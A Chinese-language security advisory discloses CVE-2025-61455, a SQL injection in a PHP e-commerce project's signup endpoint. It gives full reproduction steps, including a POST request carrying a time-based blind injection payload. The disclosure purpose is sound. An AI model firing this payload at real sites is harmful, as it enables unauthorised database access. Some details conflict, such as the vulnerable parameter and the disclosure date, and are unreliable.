披露日期: 2025 年 10 月 14 日
CVE ID: CVE-2025-61455
严重性: 严重(CVSS 9.8)
E-commerce Project v1.0 中存在一个严重的 SQL 注入漏洞,具体位于 signup.inc.php 端点。该应用程序直接将未经净化的用户输入拼接到 SQL 查询中,允许未经身份验证的攻击者绕过身份验证并执行任意 SQL 命令。
此问题已被分配标识符 CVE-2025-61455。在公开披露时,尚无官方补丁可用。
signup.inc.phphttps://localhost/e-commerce-main/includes/signup.inc.php该应用程序在 SQL 查询中直接使用未经净化的输入,未进行任何输入验证或使用预处理语句。该漏洞存在于 signup.inc.php 文件的 aid 参数中。
攻击者可以通过 email 参数注入恶意 SQL 代码,从而实现基于时间的盲 SQL 注入攻击。
易受攻击的代码示例:
$query = "SELECT * FROM table WHERE email='$email'";
这允许注入可操纵查询逻辑并提取敏感数据的攻击载荷。
| CWE ID | 标题 |
|---|---|
| CWE-89 | SQL 命令中特殊元素的不当中和(SQL 注入) |
| 评分 | 严重性 | 向量字符串 |
|---|---|---|
| 9.8 | 严重 | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
成功利用该漏洞可能导致:
git clone https://github.com/Bhabishya-123/E-commerce.git
使用 XAMPP/LAMP 部署项目,并导航至:
http://localhost/e-commerce-main/includes/signup.inc.php
发送以下恶意 HTTP 请求:
POST /e-commerce-main/includes/signup.inc.php HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
name=DvYLInUG&[email protected]'%2b(select*from(select(sleep(20)))a)%2b'&address=BWhKCxUw&number=666897&pwd=n7N%21j3r%21T7&rpwd=k0U%21t0f%21E9&submit=
说明:
email 参数包含一个基于时间的 SQL 注入载荷:'+(select*from(select(sleep(20)))a)+'
如果应用程序在响应前延迟 20 秒,则说明 SQL 注入成功。
mysqli_prepare() 或 PDO)替换动态 SQL 查询。| 事件 | 日期 |
|---|---|
| 发现漏洞 | 2025 年 9 月 16 日 |
| 公开披露 | 2025 年 10 月 13 日 |
| 补丁可用性 | ❌ 截至披露时不可用 |
该漏洞由以下人员发现并负责任地披露:
Tansique Dasari
🔗 GitHub
✉️ [email protected]
💬 由于供应商未作出回应,本公告为独立发布。